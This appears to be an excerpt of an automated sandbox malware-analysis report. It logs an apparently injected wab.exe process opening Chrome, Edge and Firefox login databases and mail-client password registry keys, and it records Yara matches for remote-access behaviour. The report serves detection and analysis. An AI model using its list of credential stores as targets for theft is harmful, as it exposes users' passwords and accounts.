Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B22264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 10_2_22B22264
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 21_2_004082CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0041739B GetVersionExW, 19_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 21_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 21_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 21_2_00402DB3
Source: Yara match File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wab.exe PID: 1792, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED